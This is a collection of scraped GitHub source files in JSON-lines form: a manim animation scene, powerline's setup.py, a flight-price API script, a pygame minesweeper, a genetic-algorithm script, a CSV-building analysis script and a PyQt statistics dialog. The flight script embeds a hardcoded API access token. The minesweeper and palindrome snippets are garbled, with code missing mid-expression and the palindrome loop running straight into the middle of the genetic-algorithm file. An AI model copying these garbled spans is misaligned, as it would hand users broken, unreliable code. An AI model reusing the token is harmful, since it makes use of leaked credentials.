uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)\n quantum.to_edge(DOWN, MED_LARGE_BUFF)\n\n arrow = OldTex(\"\\\\Downarrow\")\n arrow.scale(4)\n arrow.move_to(Line(\n uncertainty_principle.get_bottom(),\n quantum.get_top(),\n ))\n\n cross = Cross(arrow)\n cross.set_stroke(RED, 20)\n\n is_word, not_word = is_not = OldTexText(\"is\", \"\\\\emph{NOT}\")\n is_not.scale(3)\n is_word.move_to(arrow)\n # is_word.shift(0.6*UP)\n not_word.set_color(RED)\n not_word.set_stroke(RED, 3)\n not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)\n not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)\n\n dot_cloud = ProbabalisticDotCloud(\n n_copies = 1000,\n )\n dot_gdw = dot_cloud.gaussian_distribution_wrapper\n # dot_gdw.rotate(3*DEGREES)\n dot_gdw.rotate(25*DEGREES)\n # dot_gdw.scale(2)\n dot_gdw.scale(2)\n # dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)\n dot_gdw.move_to(quantum)\n\n\n\n def get_func(a):\n return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)\n axes = Axes(\n x_min = -6, x_max = 6,\n x_axis_config = {\"unit_size\" : 0.25}\n )\n graphs = VGroup(*[\n axes.get_graph(get_func(a))\n for a in (10, 3, 1, 0.3, 0.1,)\n ])\n graphs.arrange(DOWN, buff = 0.6)\n 
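# --- Illustrative aside (not part of the original scene code) -----------------
# The Thumbnail graphs above are Gaussian-windowed cosines
# 0.5*exp(-a*t**2)*cos(TAU*t) for shrinking a, paired a few lines below with
# their Fourier transforms: the wider the packet is in time, the narrower its
# spectrum.  A small numpy check of that trade-off (assumed helper, not called
# anywhere in the file):
def _rms_widths_sketch(a, n=4096, t_max=40.0):
    import numpy as np
    ts = np.linspace(-t_max, t_max, n, endpoint=False)
    vals = 0.5 * np.exp(-a * ts**2) * np.cos(2 * np.pi * ts)
    freqs = np.fft.rfftfreq(n, d=ts[1] - ts[0])
    spec = np.abs(np.fft.rfft(vals))

    def rms_width(xs, weights):
        mean = np.average(xs, weights=weights)
        return np.sqrt(np.average((xs - mean) ** 2, weights=weights))

    # Envelope width in time vs. spectral width in frequency: as a shrinks,
    # the first grows roughly like 1/sqrt(a) while the second shrinks like
    # sqrt(a), so their product stays roughly constant.
    return rms_width(ts, np.abs(vals)), rms_width(freqs, spec)
# ------------------------------------------------------------------------------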
graphs.to_corner(UP+LEFT)\n graphs.set_color_by_gradient(BLUE_B, BLUE_D)\n\n frequency_axes = Axes(\n x_min = 0, x_max = 2,\n x_axis_config = {\"unit_size\" : 1}\n )\n fourier_graphs = VGroup(*[\n get_fourier_graph(\n frequency_axes, graph.underlying_function,\n t_min = -10, t_max = 10,\n )\n for graph in graphs\n ])\n for graph, fourier_graph in zip(graphs, fourier_graphs):\n fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)\n fourier_graph.scale(3)\n fourier_graph.stretch(3, 1)\n fourier_graph.move_to(graph)\n fourier_graph.to_edge(RIGHT)\n\n self.add(graphs, fourier_graphs)\n\n\n self.add(dot_cloud)\n self.add(\n uncertainty_principle, quantum,\n )\n self.add(arrow, cross)\n # self.add(is_word)\n # self.add(is_not)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"3b1b/videos","sub_path":"_2018/uncertainty.py","file_name":"uncertainty.py","file_ext":"py","file_size_in_byte":152993,"program_lang":"python","lang":"en","doc_type":"code","stars":5003,"dataset":"github-code","pt":"67"} +{"seq_id":"16934175838","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8:noet\nfrom __future__ import (unicode_literals, division, absolute_import, print_function)\n\nimport os\nimport sys\nimport logging\nimport shlex\nimport subprocess\n\nfrom setuptools import setup, find_packages\n\nfrom powerline.version import get_version\n\nCURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\ntry:\n\tREADME = open(os.path.join(CURRENT_DIR, 'README.rst'), 'rb').read().decode('utf-8')\nexcept IOError:\n\tREADME = ''\n\nOLD_PYTHON = sys.version_info < (2, 7)\n\n\ndef compile_client():\n\t'''Compile the C powerline-client script.'''\n\n\tif hasattr(sys, 'getwindowsversion'):\n\t\traise NotImplementedError()\n\telse:\n\t\tfrom distutils.ccompiler import new_compiler\n\t\tcompiler = new_compiler().compiler\n\t\tcflags = os.environ.get('CFLAGS', str('-O3'))\n\t\t# A normal split would do a split on each space which might be incorrect. 
The\n\t\t# shlex will not split if a space occurs in an arguments value.\n\t\tsubprocess.check_call(compiler + shlex.split(cflags) + ['client/powerline.c', '-o', 'scripts/powerline'])\n\ntry:\n\tcompile_client()\nexcept Exception as e:\n\tprint('Compiling C version of powerline-client failed')\n\tlogging.exception(e)\n\t# FIXME Catch more specific exceptions\n\timport shutil\n\tif hasattr(shutil, 'which'):\n\t\twhich = shutil.which\n\telse:\n\t\tsys.path.append(CURRENT_DIR)\n\t\tfrom powerline.lib.shell import which\n\tcan_use_scripts = True\n\tif which('socat') and which('sed') and which('sh'):\n\t\tprint('Using powerline.sh script instead of C version (requires socat, sed and sh)')\n\t\tshutil.copyfile('client/powerline.sh', 'scripts/powerline')\n\telse:\n\t\tprint('Using powerline.py script instead of C version')\n\t\tshutil.copyfile('client/powerline.py', 'scripts/powerline')\nelse:\n\tcan_use_scripts = False\n\nsetup(\n\tname='powerline-status',\n\tversion=get_version(),\n\tdescription='The ultimate statusline/prompt utility.',\n\tlong_description=README,\n\tclassifiers=[\n\t\t'Development Status :: 4 - Beta',\n\t\t'Environment :: Console',\n\t\t'Environment :: Plugins',\n\t\t'Intended Audience :: End Users/Desktop',\n\t\t'License :: OSI Approved :: MIT License',\n\t\t'Natural Language :: English',\n\t\t'Operating System :: Microsoft :: Windows',\n\t\t'Operating System :: POSIX',\n\t\t'Programming Language :: Python :: 3.6',\n\t\t'Programming Language :: Python :: 3.7',\n\t\t'Programming Language :: Python :: 3.8',\n\t\t'Programming Language :: Python :: 3.9',\n\t\t'Programming Language :: Python :: Implementation :: CPython',\n\t\t'Programming Language :: Python :: Implementation :: PyPy',\n\t],\n\tdownload_url='https://github.com/powerline/powerline/archive/develop.zip',\n\tauthor='Kim Silkebaekken',\n\tauthor_email='kim.silkebaekken+vim@gmail.com',\n\turl='https://github.com/powerline/powerline',\n\tlicense='MIT',\n\t# XXX Python 3 doesn’t allow compiled C files to be included in the scripts\n\t# list below. This is because Python 3 distutils tries to decode the file to\n\t# ASCII, and fails when powerline-client is a binary.\n\t#\n\t# XXX Python 2 fucks up script contents*. Not using it to install scripts\n\t# any longer.\n\t# * Consider the following input:\n\t# % alias hex1=$'hexdump -e \\'\"\" 1/1 \"%02X\\n\"\\''\n\t# % diff <(hex1 ./scripts/powerline) <(hex1 ~/.local/bin/powerline)\n\t# This will show output like\n\t# 375c375\n\t# < 0D\n\t# ---\n\t# > 0A\n\t# (repeated, with diff segment header numbers growing up).\n\t#\n\t# FIXME Current solution does not work with `pip install -e`. 
\n\tscripts=[\n\t\t'scripts/powerline-lint',\n\t\t'scripts/powerline-daemon',\n\t\t'scripts/powerline-render',\n\t\t'scripts/powerline-config',\n\t] + (['scripts/powerline'] if can_use_scripts else []),\n\tdata_files=(None if can_use_scripts else (('bin', ['scripts/powerline']),)),\n\tkeywords='',\n\tpackages=find_packages(exclude=('tests', 'tests.*')),\n\tinclude_package_data=True,\n\tzip_safe=False,\n\tinstall_requires=['argparse'] if OLD_PYTHON else [],\n\textras_require={\n\t\t'docs': [\n\t\t\t'Sphinx',\n\t\t\t'sphinx_rtd_theme',\n\t\t],\n\t},\n\ttest_suite='tests' if not OLD_PYTHON else None,\n)\n","repo_name":"powerline/powerline","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":13989,"dataset":"github-code","pt":"67"}
{"seq_id":"18040648094","text":"import requests\nimport json\n \nurl = \"https://api.travelpayouts.com/v2/prices/month-matrix\"\n \nquerystring = {\"currency\":\"usd\",\"show_to_affiliates\":\"true\",\"origin\":\"LED\",\"destination\":\"HKT\"}\n \nheaders = {'x-access-token': '2160a9f9ca2fa3d348f4a3a32504538e'}\n \nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n#store the response text and load it into a dictionary using the loads function\njson_input = json.loads(response.text)\n\n#extract the list at the \"data\" key in the dictionary\ndata_list = json_input[\"data\"]\n\n#create 2 empty lists to store data to return later\nlessThan650 = []\ngreaterThan650 = []\n\n#traverse through the list extracted earlier\nfor i in range(0, len(data_list)):\n    #check for a value less than or equal to 650 at the \"value\" key\n    if (int(data_list[i][\"value\"]) <= 650):\n        #populate the list with the matching dictionary\n        lessThan650.append(data_list[i])\n    #check for a value greater than 650 at the \"value\" key\n    if (int(data_list[i][\"value\"]) > 650):\n        #populate the list with the matching dictionary\n        greaterThan650.append(data_list[i])\n\n#Generate a menu for user input to select what option they want\nrunning = True\nwhile (running):\n    userInput = input(\"Enter 0 if you would like to see the flights less than 650 \\nEnter 1 if you would like flights for more than 650\\nEnter anything else to exit code:\")\n    if userInput == '0':\n        print(lessThan650, \"\\n\\n\")\n    if userInput == '1':\n        print(greaterThan650, \"\\n\\n\")\n    if userInput != '0' and userInput != '1':\n        print(\"\\n\\nExiting code\")\n        running = False\n\n","repo_name":"HappyStackRiver/Kura","sub_path":"Python_Scripts/practiceDictionaries.py","file_name":"practiceDictionaries.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"23588458359","text":"import pygame\r\nimport random\r\nclicks=0\r\nclass block:\r\n\r\n    def __init__(self, x):\r\n        self.position=x\r\n        self.opened = 0\r\n        self.bomb = 0\r\n    def update(self):\r\n        global clicks\r\n        if self.opened==0:\r\n            pygame.draw.rect(s,(255,0,0),(((self.position)%n)*50,((self.position)//n)*50,50,50))\r\n            pygame.draw.rect(s, (0, 0, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50),2)\r\n        else:\r\n            pygame.draw.rect(s, (0, 255, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50))\r\n            pygame.draw.rect(s, (0, 0, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50), 2)\r\n            distext=0\r\n            if self.bomb==-1:\r\n                distext=-1\r\n                print(\"game over u lost\")\r\n                pygame.quit()\r\n                quit()\r\n            else:\r\n                
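# --- editor's aside (illustrative sketch, not part of the original records) ---
# The price split in practiceDictionaries.py above expressed with list
# comprehensions; data_list is assumed to have the same shape as the API's
# "data" list (dicts with an integer-like "value" field).
data_list = [{"value": "500"}, {"value": "700"}]
lessThan650 = [d for d in data_list if int(d["value"]) <= 650]     # [{'value': '500'}]
greaterThan650 = [d for d in data_list if int(d["value"]) > 650]   # [{'value': '700'}]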
to_check=[]\r\n lb,rb,ub,db=0,0,0,0\r\n if (self.position+1)//n ==(self.position)//n:\r\n to_check.append(self.position+1)\r\n rb=1\r\n if (self.position - 1) // n == (self.position) // n:\r\n to_check.append(self.position - 1)\r\n lb=1\r\n if (self.position -n)>=0:\r\n to_check.append(self.position -n)\r\n ub=1\r\n if (self.position +n)number_of_bombs:\r\n bomblist=random.sample(range(0, n*n), number_of_bombs)\r\n for jj in bomblist:\r\n l[jj].bomb=-1\r\nelse:\r\n l[0].bomb=-1\r\nwhile(1):\r\n for i in pygame.event.get():\r\n if i.type==12:\r\n pygame.quit()\r\n quit()\r\n if i.type==pygame.MOUSEBUTTONDOWN:\r\n if i.button==1:\r\n x,y=i.pos\r\n x=x//50\r\n y=y//50\r\n mousepos=y*n+x\r\n if l[mousepos].opened==0:\r\n l[mousepos].opened=1\r\n l[mousepos].update()\r\n pygame.display.update()\r\n elif i.button==3:\r\n x,y=i.pos\r\n x=(x//50)*50\r\n y=(y//50)*50\r\n texts = text.render(\"FL\", True, (0, 0, 0))\r\n s.blit(texts, (x+10,y) )\r\n pygame.display.update()\r\n","repo_name":"MrMadFox/minesweeper","sub_path":"mine.py","file_name":"mine.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32388930478","text":"# string=\"aabaa\"\n# length = 5\n# length // 2\n# if string[::-1]==string:\n# print(\"true\")\n# else:\n# print(\"False\")\n\n# print(True if string == string[::-1] else False)\n\n# # do using for loop\n# n=len(string)\n# flag = 0\n# for i in range (n):\n# if string[n-i-c1] == string[i]:\n# pass\n# else:\n# print(False)\n# flag = 1\n# break\n\n# if flag == 0:\n# print(True)\nstring=\"aabaaa\"\nn=len(string)\ni = 0\nj = n-1\nwhile i mutation_rate:\n return chromosome\n\n gene_index = np.random.randint(0, len(chromosome) - 1)\n chromosome = list(chromosome)\n chromosome[gene_index] = '1' if chromosome[gene_index] == '0' else '0'\n return ''.join(chromosome)\n\n\ndef select(population):\n return np.random.choice(population)\n\n\ndef nextGen():\n new_population = []\n # sorted_population = sort_population_by_fitness(population)\n\n for i in range(0, len(population), 2):\n a = population[i]\n b = population[i + 1]\n\n point = np.random.randint(1, len(a) - 2)\n\n result_a = a[:point] + b[point:]\n result_b = b[:point] + a[point:]\n\n result_a = mutate(result_a)\n result_b = mutate(result_b)\n\n new_population.append(result_a)\n new_population.append(result_b)\n\n return new_population\n\n\ndef f_plot():\n x = np.linspace(x_min, x_max, int(N))\n y = f(x)\n plt.plot(x, y)\n plt.show()\n\n\nf_plot()\n\nX = x_min\ncount = 0\nwhile X <= x_max + E:\n s = encode(X)\n print('X =', X, ' Nx =', s, ' Nxr =', decode(s), ' f(X) = ', f(X))\n X += E\n count += 1\nprint(count)\n\n# init population\npopulation_size = 20\npopulation = [encode(np.random.uniform(x_min, x_max)) for i in range(population_size)]\n\nfor i in range(100):\n print('Population #' + str(i))\n print(population)\n print('\\n')\n\n population = nextGen()\n\nprint('true max: (', 2, ',', 9.1543, ')')\nprint('true min: (', -0.630761, ',', -0.499236, ')')\n\nx = decode(sort_population_by_fitness(population)[-1])\ny = f(x)\n\nprint('max: (', x, ',', y, ')')\n\nx = decode(sort_population_by_fitness(population)[0])\ny = f(x)\n\nprint('min: (', x, ',', y, ')')\n","repo_name":"CyanoFresh/KPI-Labs","sub_path":"AI/lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4197488379","text":"import csv\nimport 
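# --- editor's aside (illustrative sketch, not part of the original records) ---
# Single-point crossover as performed inside nextGen() above, reduced to a
# self-contained sketch with two hypothetical 8-bit chromosome strings.
import numpy as np
a, b = "00000000", "11111111"
point = np.random.randint(1, len(a) - 2)  # cut point strictly inside the string
child_a = a[:point] + b[point:]           # head of a joined to tail of b
child_b = b[:point] + a[point:]           # head of b joined to tail of a
print(child_a, child_b)                   # e.g. 00011111 11100000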
os\nimport json\n\ndef get_args():\n n_agent = 4\n n, k, p = 5, 3, 7\n t, ts = 8, 2\n exp_name = \"20190104-014057\"\n exp_id = \"exp0\"\n return n_agent, n, k, p, t, ts, exp_name, exp_id\n\ndef get_file_path(n_agent, n, k, p, t, ts, exp_name, exp_id):\n args_str = \"NA{}_N{}_K{}_P{}_T{}_Ts{}\".format(n_agent, n, k, p, t, ts)\n exp_dir = os.path.join(\"..\", \"..\", \"result\",\n \"batch_{exp_name}_{args_str}\",\n \"mul_{exp_name}_{exp_id}\").format(exp_name=exp_name,\n args_str=args_str,\n exp_id=exp_id)\n input_json_name = \"mul_{exp_name}_{exp_id}_leadership_bill.json\".format(exp_name=exp_name, exp_id=exp_id)\n output_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill.csv\".format(exp_name=exp_name, exp_id=exp_id)\n output_sum_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill_sum.csv\".format(exp_name=exp_name, exp_id=exp_id)\n output_stage_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill_stage.csv\".format(exp_name=exp_name, exp_id=exp_id)\n args = {\n \"input_json_path\": os.path.join(exp_dir, input_json_name),\n \"output_csv_path\": os.path.join(exp_dir, output_csv_name),\n \"output_sum_csv_path\": os.path.join(exp_dir, output_sum_csv_name),\n \"output_stage_csv_path\": os.path.join(exp_dir, output_stage_csv_name),\n \"agent_num\": n_agent, \"T\": t, \"Ts\": ts\n }\n return args\n\n\ndef get_walk_funcs():\n def func_fatory(assert_lists):\n def _f(jd_list, time, agent_id):\n ret_num = len(jd_list)\n for jd in jd_list:\n for asst in assert_lists:\n if not asst(jd, time, agent_id):\n ret_num -= 1\n break\n return ret_num\n\n return _f\n\n def sum_func_fatory(func_list):\n def _f(jd_list, time, agent_id):\n return sum([func(jd_list, time, agent_id) for func in func_list])\n\n return _f\n\n assert_lists = {\n 'm-plan': [\n lambda jd, ti, id: jd['record_type'] == 'm-plan',\n lambda jd, ti, id: jd['gen']['time'] == ti,\n lambda jd, ti, id: jd['gen']['person'] == id,\n lambda jd, ti, id: jd['gen']['act'] != 'start'\n ],\n 'm-info': [\n lambda jd, ti, id: jd['record_type'] == 'm-info',\n lambda jd, ti, id: jd['gen']['time'] == ti,\n lambda jd, ti, id: jd['gen']['person'] == id,\n lambda jd, ti, id: jd['gen']['act'] != 'start'\n ],\n 'talking-whlj': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'whlj',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-dyjs': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'dyjs',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-xxjl': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'xxjl',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-xtfg': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'xtfg',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-tljc': [\n lambda jd, ti, id: 
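# --- editor's aside (illustrative sketch, not part of the original record) ---
# The assert-list pattern used by func_fatory above: a record is counted only
# if every predicate in the list holds for it. A minimal self-contained
# version with two toy predicates and two toy records:
toy_asserts = [
    lambda jd, ti, id: jd['record_type'] == 'm-plan',
    lambda jd, ti, id: jd['gen']['time'] == ti,
]
def count_matching(jd_list, ti, id):
    # count records for which all predicates hold
    return sum(1 for jd in jd_list if all(a(jd, ti, id) for a in toy_asserts))
toy_records = [{'record_type': 'm-plan', 'gen': {'time': 0}},
               {'record_type': 'm-info', 'gen': {'time': 0}}]
print(count_matching(toy_records, 0, 0))  # -> 1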
jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'tljc',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-get-plan': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'get_a_plan',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-commit': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'commit_plan',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-get_useful_info': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'get_useful_info',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ]\n }\n walk_funcs = {asst_name: func_fatory(assert_lists[asst_name]) for asst_name in assert_lists}\n walk_funcs['adapt_sig'] = sum_func_fatory([walk_funcs['m-plan'], walk_funcs['m-info']])\n walk_funcs['adapt_impact'] = sum_func_fatory(\n [walk_funcs['talking-get_useful_info'], walk_funcs['talking-get-plan']])\n walk_funcs['admin_impact'] = sum_func_fatory([walk_funcs['talking-m-req-xtfg'], walk_funcs['talking-commit']])\n walk_funcs['relat_enable_impact'] = sum_func_fatory([walk_funcs['talking-whlj'], walk_funcs['talking-dyjs']])\n walk_funcs['info_enable_impact'] = sum_func_fatory(\n [walk_funcs['talking-m-req-xxjl'], walk_funcs['talking-m-req-tljc']])\n return walk_funcs\n\n\ndef fill_tabel_by_json(input_json, args):\n n_agent = args['agent_num']\n total_t = args['T']\n walk_funcs = get_walk_funcs()\n\n def json_list_key_select(jdata, key, value):\n def _dfs(the_jd):\n for k in the_jd:\n if k == key and the_jd[k] == value:\n return True\n elif isinstance(the_jd[k], dict) and _dfs(the_jd[k]):\n return True\n return False\n\n return [jd for jd in jdata if _dfs(jd)]\n\n title = ['T', 'agent_no'] + [func_name for func_name in walk_funcs]\n ret_table = []\n for ti in range(total_t):\n t_split_json = json_list_key_select(input_json, 'time', ti)\n for agent_i in range(n_agent):\n t_a_split_json = json_list_key_select(t_split_json, 'person', agent_i)\n new_row = {'T': ti, 'agent_no': agent_i}\n for func_name in walk_funcs:\n func = walk_funcs[func_name]\n new_row[func_name] = func(t_a_split_json, ti, agent_i)\n ret_table.append(new_row)\n return ret_table, title\n\n\ndef calc_output_sum(csv_table, title, args):\n n_agent = args['agent_num']\n total_t = args['T']\n\n def row_i(ti, ai):\n return ti * n_agent + ai\n\n sum_table = []\n for ti in range(total_t):\n for ai in range(n_agent):\n new_row = {'T': ti, 'agent_no': ai}\n for k in title:\n if k == 'T' or k == 'agent_no':\n continue\n new_row[k] = csv_table[row_i(ti, ai)][k]\n new_row[k] += sum_table[row_i(ti - 1, ai)][k] if ti > 0 else 0\n sum_table.append(new_row)\n return sum_table\n\n\ndef calc_output_stage(csv_table, title, args):\n n_agent = args['agent_num']\n total_t = args['T']\n ts = args['Ts']\n stage_n = total_t // ts\n\n def row_i(ti, ai):\n return ti * n_agent + ai\n\n stage_table = []\n 
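# --- editor's aside (illustrative sketch, not part of the original record) ---
# The (time, agent) -> row flattening used by row_i above, plus the stage
# bucketing that follows: with the values from get_args() (n_agent=4, T=8,
# Ts=2) there are 8 // 2 = 4 stages, and stage si sums the rows for
# ti in range(si * ts, (si + 1) * ts).
n_agent, total_t, ts = 4, 8, 2
row_i = lambda ti, ai: ti * n_agent + ai
print(row_i(2, 3))  # -> 11 (time step 2, agent 3)
print([list(range(si * ts, (si + 1) * ts)) for si in range(total_t // ts)])
# -> [[0, 1], [2, 3], [4, 5], [6, 7]]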
for si in range(stage_n):\n        for ai in range(n_agent):\n            new_row = {'T': (si + 1) * ts - 1, 'agent_no': ai}\n            for k in title:\n                if k == 'T' or k == 'agent_no':\n                    continue\n                new_row[k] = sum([csv_table[row_i(ti, ai)][k] for ti in range(si * ts, (si + 1) * ts)])\n            stage_table.append(new_row)\n    return stage_table\n\n\ndef main(args):\n    input_json_path = args['input_json_path']\n    output_csv_path = args['output_csv_path']\n    output_sum_csv_path = args['output_sum_csv_path']\n    output_stage_csv_path = args['output_stage_csv_path']\n\n    with open(input_json_path, \"r\") as fp:\n        input_json = json.load(fp)\n\n    output_csv_table, output_title = fill_tabel_by_json(input_json, args)\n    output_sum_csv_table = calc_output_sum(output_csv_table, output_title, args)\n    output_stage_csv_table = calc_output_stage(output_csv_table, output_title, args)\n\n    def save_csv(filepath, csv_table, title):\n        with open(filepath, \"w\") as fp:\n            csv_d = csv.DictWriter(fp, fieldnames=title, lineterminator=\"\\n\")\n            csv_d.writeheader()\n            csv_d.writerows(csv_table)\n\n    save_csv(output_csv_path, output_csv_table, output_title)\n    save_csv(output_sum_csv_path, output_sum_csv_table, output_title)\n    save_csv(output_stage_csv_path, output_stage_csv_table, output_title)\n\n\nif __name__ == \"__main__\":\n    n_agent, n, k, p, t, ts, exp_name, exp_id = get_args()\n    args = get_file_path(n_agent, n, k, p, t, ts, exp_name, exp_id)\n    main(args)\n","repo_name":"wzkDTerH/psySandbox","sub_path":"analyze_script/leadership_bill_post/leadership_bill_post.py","file_name":"leadership_bill_post.py","file_ext":"py","file_size_in_byte":9964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"70939494935","text":"#---------------------------------------------------------------------------------#\r\n# Program: Biblioteca Digital de Proyectos de Informatica #\r\n# Programmer: Luis Amaya #\r\n# Analysts: Jose Astudillo / Josmary Botaban #\r\n# Product developed for the PNF de Informatica at UPTJAA, El Tigre campus #\r\n# October (2018) #\r\n# Version 1.0 #\r\n# Module: System Statistics #\r\n# Description: Generates statistics for the projects registered in the system #\r\n#---------------------------------------------------------------------------------#\r\n\r\n# System library imports\r\nimport sys, os, shutil, functools, re\r\nfrom PyQt5.QtWidgets import QApplication, QPushButton, QMessageBox, QDialog, QTableWidget, QTableWidgetItem, QFileDialog\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtGui import QIcon, QFont, QColor\r\nfrom PyQt5.QtCore import Qt\r\nimport ctypes #GetSystemMetrics\r\nimport psycopg2, psycopg2.extras, psycopg2.extensions, hashlib, select\r\nimport easygui as eg\r\nfrom reportlab.pdfgen import canvas\r\nfrom reportlab.lib.pagesizes import letter, landscape\r\nimport webbrowser as wb\r\nfrom datetime import datetime, date, time, timedelta\r\nimport calendar\r\nimport os.path as path\r\n\r\nclass DialogoEstadistica(QDialog):\r\n\t#Class constructor method\r\n\tdef __init__(self):\r\n\t\t#Initialize the dialog object\r\n\t\tQDialog.__init__(self)\r\n\t\tuic.loadUi(\"estadisticas.ui\", self)\r\n\t\t#Enable the dialog box\r\n\t\tself.setEnabled(True)\r\n\t\tself.setWindowFlags(Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)\r\n\r\n\t\t#Center the window on the screen\r\n\t\tresolucion = ctypes.windll.user32\r\n\t\tresolucion_ancho = 
resolucion.GetSystemMetrics(0)\r\n\t\tresolucion_alto = resolucion.GetSystemMetrics(1)\r\n\t\tleft = (resolucion_ancho / 2) - (self.frameSize().width() / 2)\r\n\t\ttop = (resolucion_alto / 2) - (self.frameSize().height() / 2) - 40\r\n\t\tself.move(left, top)\r\n\t\tself.archivo_infosvr = ''\r\n\t\tself.infosvr = []\r\n\t\tself.lista = []\r\n\t\tself.BD_Name = ''\r\n\t\tself.BD_User = ''\r\n\t\tself.BD_Pass = ''\r\n\t\tself.archivo_infosvr = open('regsvr.txt','r')\r\n\t\tself.infosvr = self.archivo_infosvr.readlines()\r\n\t\tself.BD_Name = self.infosvr[0]\r\n\t\tself.BD_Name = self.BD_Name.replace('\\n', '').replace('\\r', '') \r\n\t\tself.BD_User = self.infosvr[1]\r\n\t\tself.BD_User = self.BD_User.replace('\\n', '').replace('\\r', '') \r\n\t\tself.BD_Pass = self.infosvr[2]\r\n\t\tself.BD_Pass = self.BD_Pass.replace('\\n', '').replace('\\r', '') \r\n\t\tself.archivo_infosvr.close()\r\n\r\n\t\t#Establish the database connection\r\n\t\tcad_con = \"dbname='%s' user='%s' password='%s' host='localhost'\" % (self.BD_Name, self.BD_User, self.BD_Pass)\r\n\t\ttry:\r\n\t\t\tself.db = psycopg2.connect(cad_con)\r\n\t\texcept:\r\n\t\t\tQMessageBox.warning(self, \"Error de Base de Datos\", \"Ocurrio un error al intentar comunicarse con la Base de Datos\", QMessageBox.Ok)\r\n\t\t\tself.quit()\r\n\t\telse:\r\n\t\t\tself.db.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\r\n\t\t\tself.cursor = self.db.cursor()\r\n\r\n\t\t# Variable definitions\r\n\t\tself.hoy = datetime.today()\r\n\t\tself.formato_fecha1 = \"%d días del mes de %B del año %Y\"\r\n\t\tself.formato_fecha2 = \"%d-%m-%Y\"\r\n\t\tself.formato_fecha3 = \"%m\"\r\n\t\tself.formato_fecha4 = \"%Y\"\r\n\t\tself.formato_fecha5 = \"%Y-%m-%d-%H%M%S\"\r\n\t\tself.fechaarchivo = self.hoy.strftime(self.formato_fecha5)\r\n\t\tself.ano = self.hoy.strftime(self.formato_fecha4)\r\n\t\tself.mes = self.meses(self.hoy.strftime(self.formato_fecha3))\r\n\t\tself.formato_fecha1 = \"%d días del mes de \" + self.mes + \" del año %Y\"\r\n\t\tself.fecha1 = self.hoy.strftime(self.formato_fecha2)\r\n\t\tself.fecha2 = self.hoy.strftime(self.formato_fecha1)\r\n\t\tself.archivo = './Estadisticas/Estadistica '+self.fechaarchivo + '.pdf'\r\n\t\tself.archivo2 = (r'.\\Estadisticas\\Estadistica '+self.fechaarchivo + '.pdf')\r\n\t\t#Creating the PDF 